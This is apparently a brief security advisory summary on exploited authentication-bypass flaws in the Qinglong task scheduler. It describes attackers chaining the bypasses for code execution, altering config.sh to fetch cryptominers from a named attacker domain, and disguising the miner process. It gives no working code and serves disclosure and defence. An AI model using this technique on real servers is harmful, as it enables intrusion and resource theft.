Hackers exploited two authentication bypass flaws in the Qinglong open-source task scheduler to deploy cryptominers on developersβ servers, with attacks beginning in early February before the issues were publicly disclosed. The issues (CVE-2026-3965 and CVE-2026-4047) stem from a mismatch between middleware authorization and Express.js routing and were effectively fixed in PR #2941 after an initial insufficient mitigation; #Qinglong #CVE-2026-3965
Keypoints
- Two authentication bypasses (CVE-2026-3965 and CVE-2026-4047) in Qinglong can be chained to achieve remote code execution.
- Exploitation began on publicly exposed Qinglong panels from Feb 7, before public disclosure at the end of February.
- Attackers modified config.sh to download and run cryptominer binaries (saved as /ql/data/db/.fullgc) from file.551911.xyz for multiple architectures.
- The miner process was named β.fullgcβ to mimic a harmless Full GC and evade detection while consuming high CPU.
- Maintainers issued an initial mitigation (PR #2924) that was insufficient; the authentication bypass was properly fixed in PR #2941, and users should update versions 2.20.1 and older immediately.